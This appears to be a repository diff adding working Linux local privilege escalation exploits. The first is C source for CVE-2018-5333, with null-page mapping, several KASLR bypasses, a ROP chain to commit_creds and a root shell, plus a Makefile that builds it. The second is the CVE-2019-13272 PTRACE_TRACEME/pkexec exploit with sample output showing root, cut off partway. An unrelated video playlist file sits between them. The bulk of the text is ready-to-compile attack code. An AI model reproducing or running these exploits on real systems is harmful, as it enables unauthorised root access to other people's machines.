+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+
@@ -0,0 +1,15 @@
+#EXTM3U
+#EXT-X-VERSION:3
+#EXT-X-TARGETDURATION:4
+#EXT-X-MEDIA-SEQUENCE:0
+#EXTINF:3.433333,
+epicsax0.ts
+#EXTINF:1.700000,
+epicsax1.ts
+#EXTINF:1.700000,
+epicsax2.ts
+#EXTINF:1.700000,
+epicsax3.ts
+#EXTINF:1.466667,
+epicsax4.ts
+#EXT-X-ENDLIST
@@ -0,0 +1,4 @@
+
+all:
+	x86_64-linux-musl-cc -static -s -pie poc.c -o exploit
+
@@ -0,0 +1,534 @@
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+//
+// Uses pkexec technique. Requires execution within the context
+// of a user session with an active PolKit agent.
+//
+// Exploitation will fail if kernel.yama.ptrace_scope >= 2;
+// or SELinux deny_ptrace=on.
+// ---
+// Original discovery and exploit author: Jann Horn
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
+// ---
+// <bcoles@gmail.com>
+// - added known helper paths
+// - added search for suitable helpers
+// - added automatic targeting
+// - changed target suid executable from passwd to pkexec
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
+// ---
+// Tested on:
+// - Ubuntu 16.04.5 kernel 4.15.0-29-generic
+// - Ubuntu 18.04.1 kernel 4.15.0-20-generic
+// - Ubuntu 18.04.3 kernel 5.0.0-23-generic
+// - Ubuntu 19.04 kernel 5.0.0-15-generic
+// - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
+// - Linux Mint 17.3 kernel 4.4.0-89-generic
+// - Linux Mint 18.3 kernel 4.13.0-16-generic
+// - Linux Mint 19 kernel 4.15.0-20-generic
+// - Xubuntu 16.04.4 kernel 4.13.0-36-generic
+// - ElementaryOS 0.4.1 4.8.0-52-generic
+// - Backbox 6 kernel 4.18.0-21-generic
+// - Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
+// - Kali kernel 4.19.0-kali5-amd64
+// - MX 18.3 kernel 4.19.37-2~mx17+1
+// - RHEL 8.0 kernel 4.18.0-80.el8.x86_64
+// - CentOS 8 kernel 4.18.0-80.el8.x86_64
+// - Debian 9.4.0 kernel 4.9.0-6-amd64
+// - Debian 10.0.0 kernel 4.19.0-5-amd64
+// - Devuan 2.0.0 kernel 4.9.0-6-amd64
+// - SparkyLinux 5.8 kernel 4.19.0-5-amd64
+// - SparkyLinux 5.9 kernel 4.19.0-6-amd64
+// - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
+// - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
+// - Mageia 6 kernel 4.9.35-desktop-1.mga6
+// - Antergos 18.7 kernel 4.17.6-1-ARCH
+// - lubuntu 19.04 kernel 5.0.0-13-generic
+// - Sabayon 19.03 kernel 4.20.0-sabayon
+// - Pop! OS 19.04 kernel 5.0.0-21-generic
+// ---
+// [user@localhost CVE-2019-13272]$ gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root
+// [user@localhost CVE-2019-13272]$ ./ptrace_traceme_root
+// Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
+// [.] Checking environment ...
+// [~] Done, looks good
+// [.] Searching policies for useful helpers ...
+// [.] Ignoring helper (does not exist): /usr/sbin/pk-device-rebind
+// [.] Trying helper: /usr/libexec/gsd-backlight-helper
+// [.] Spawning suid process (/usr/bin/pkexec) ...
+// [.] Tracing midpid ...
+// [~] Attached to midpid
+// [root@localhost CVE-2019-13272]# id
+// uid=0(root) gid=0(root) groups=0(root),1000(user)
+// [root@localhost CVE-2019-13272]# uname -a
+// Linux localhost.localdomain 4.18.0-80.el8.x86_64 #1 SMP Tue Jun 4 09:19:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+// ---
+
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <stdio.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <stddef.h>
+#include <stdarg.h>
+#include <pwd.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+#include <sys/ptrace.h>
+#include <sys/user.h>
+#include <sys/syscall.h>
+#include <sys/stat.h>
+#include <linux/elf.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+/*
+ * enabled automatic targeting.
+ * uses pkaction to search PolKit policy actions for viable helper executables.
+ */
+#define ENABLE_AUTO_TARGETING   1
+
+/*
+ * fall back to known helpers if automatic targeting fails.
+ * note: use of these helpers may result in PolKit authentication
+ *       prompts on the session associated with the PolKit agent.
+ */
+#define ENABLE_FALLBACK_HELPERS 1
+
+static const char *SHELL = "/bin/bash";
+
+static int middle_success = 1;
+static int block_pipe[2];
+static int self_fd = -1;
+static int dummy_status;
+static const char *helper_path;
+static const char *pkexec_path = "/usr/bin/pkexec";
+static const char *pkaction_path = "/usr/bin/pkaction";
+struct stat st;
+
+const char *helpers[1024];
+
+/* known helpers to use if automatic targeting fails */
+#if ENABLE_FALLBACK_HELPERS
+const char *known_helpers[] = {
+  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
+  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
+  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
+  "/usr/lib/unity-settings-daemon/usd-wacom-led-helper",
+  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
+  "/usr/lib/x86_64-linux-gnu/cinnamon-settings-daemon/csd-backlight-helper",
+  "/usr/sbin/mate-power-backlight-helper",
+  "/usr/sbin/xfce4-pm-helper",
+  "/usr/bin/xfpm-power-backlight-helper",
+  "/usr/bin/lxqt-backlight_backend",
+  "/usr/libexec/gsd-wacom-led-helper",
+  "/usr/libexec/gsd-wacom-oled-helper",
+  "/usr/libexec/gsd-backlight-helper",
+  "/usr/lib/gsd-backlight-helper",
+  "/usr/lib/gsd-wacom-led-helper",
+  "/usr/lib/gsd-wacom-oled-helper",
+  "/usr/lib64/xfce4/session/xsfm-shutdown-helper",
+};
+#endif
+
+/* helper executables known to cause problems (hang or fail) */
+const char *blacklisted_helpers[] = {
+  "/xf86-video-intel-backlight-helper",
+  "/cpugovctl",
+  "/resetxpad",
+  "/package-system-locked",
+  "/cddistupgrader",
+};
+
+#define SAFE(expr) ({                   \
+  typeof(expr) __res = (expr);          \
+  if (__res == -1) {                    \
+    dprintf("[-] Error: %s\n", #expr);  \
+    return 0;                           \
+  }                                     \
+  __res;                                \
+})
+#define max(a,b) ((a)>(b) ? (a) : (b))
+
+/*
+ * execveat() syscall
+ * https://github.com/torvalds/linux/blob/master/arch/x86/entry/syscalls/syscall_64.tbl
+ */
+#ifndef __NR_execveat
+#  define __NR_execveat 322
+#endif
+
+/* temporary printf; returned pointer is valid until next tprintf */
+static char *tprintf(char *fmt, ...) {
+  static char buf[10000];
+  va_list ap;
+  va_start(ap, fmt);
+  vsprintf(buf, fmt, ap);
+  va_end(ap);
+  return buf;
+}
+
+/*
+ * fork, execute pkexec in parent, force parent to trace our child process,
+ * execute suid executable (pkexec) in child.
+ */
+static int middle_main(void *dummy) {
+  prctl(PR_SET_PDEATHSIG, SIGKILL);
+  pid_t middle = getpid();
+
+  self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
+
+  pid_t child = SAFE(fork());
+  if (child == 0) {
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+
+    SAFE(dup2(self_fd, 42));
+
+    /* spin until our parent becomes privileged (have to be fast here) */
+    int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
+    char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
+    while (1) {
+      char buf[1000];
+      ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
+      buf[buflen] = '\0';
+      if (strstr(buf, needle)) break;
+    }
+
+    /*
+     * this is where the bug is triggered.
+     * while our parent is in the middle of pkexec, we force it to become our
+     * tracer, with pkexec's creds as ptracer_cred.
+     */
+    SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
+
+    /*
+     * now we execute a suid executable (pkexec).
+     * Because the ptrace relationship is considered to be privileged,
+     * this is a proper suid execution despite the attached tracer,
+     * not a degraded one.
+     * at the end of execve(), this process receives a SIGTRAP from ptrace.
+     */
+    execl(pkexec_path, basename(pkexec_path), NULL);
+
+    dprintf("[-] execl: Executing suid executable failed");
+    exit(EXIT_FAILURE);
+  }
+
+  SAFE(dup2(self_fd, 0));
+  SAFE(dup2(block_pipe[1], 1));
+
+  /* execute pkexec as current user */
+  struct passwd *pw = getpwuid(getuid());
+  if (pw == NULL) {
+    dprintf("[-] getpwuid: Failed to retrieve username");
+    exit(EXIT_FAILURE);
+  }
+
+  middle_success = 1;
+  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
+        helper_path,
+        "--help", NULL);
+  middle_success = 0;
+  dprintf("[-] execl: Executing pkexec failed");
+  exit(EXIT_FAILURE);
+}
+
+/* ptrace pid and wait for signal */
+static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
+  struct user_regs_struct regs;
+  struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
+  SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+  SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
+
+  /* set up indirect arguments */
+  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
+  struct injected_page {
+    unsigned long argv[2];
+    unsigned long envv[1];
+    char arg0[8];
+    char path[1];
+  } ipage = {
+    .argv = { scratch_area + offsetof(struct injected_page, arg0) }
+  };
+  strcpy(ipage.arg0, arg0);
+  int i;
+  for (i = 0; i < sizeof(ipage)/sizeof(long); i++) {
+    unsigned long pdata = ((unsigned long *)&ipage)[i];
+    SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
+                (void*)pdata));
+  }
+
+  /* execveat(exec_fd, path, argv, envv, flags) */
+  regs.orig_rax = __NR_execveat;
+  regs.rdi = exec_fd;
+  regs.rsi = scratch_area + offsetof(struct injected_page, path);
+  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
+  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
+  regs.r8 = AT_EMPTY_PATH;
+
+  SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
+  SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
+  SAFE(waitpid(pid, &dummy_status, 0));
+
+  return 0;
+}
+
+static int middle_stage2(void) {
+  /* our child is hanging in signal delivery from execve()'s SIGTRAP */
+  pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
+  return force_exec_and_wait(child, 42, "stage3");
+}
+
+// * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
+
+static int spawn_shell(void) {
+  SAFE(setresgid(0, 0, 0));
+  SAFE(setresuid(0, 0, 0));
+  execlp(SHELL, basename(SHELL), NULL);
+  dprintf("[-] execlp: Executing shell %s failed", SHELL);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
+
+static int check_env(void) {
+  int warn = 0;
+  const char* xdg_session = getenv("XDG_SESSION_ID");
+
+  dprintf("[.] Checking environment ...\n");
+
+  if (stat(pkexec_path, &st) != 0) {
+    dprintf("[-] Could not find pkexec executable at %s\n", pkexec_path);
+    exit(EXIT_FAILURE);
+  }
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+    warn++;
+  }
+
+  if (xdg_session == NULL) {
+    dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
+    warn++;
+  }
+
+  if (system("/bin/loginctl --no-ask-password show-session \"$XDG_SESSION_ID\" | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
+    dprintf("[!] Warning: Could not find active PolKit agent\n");
+    warn++;
+  }
+
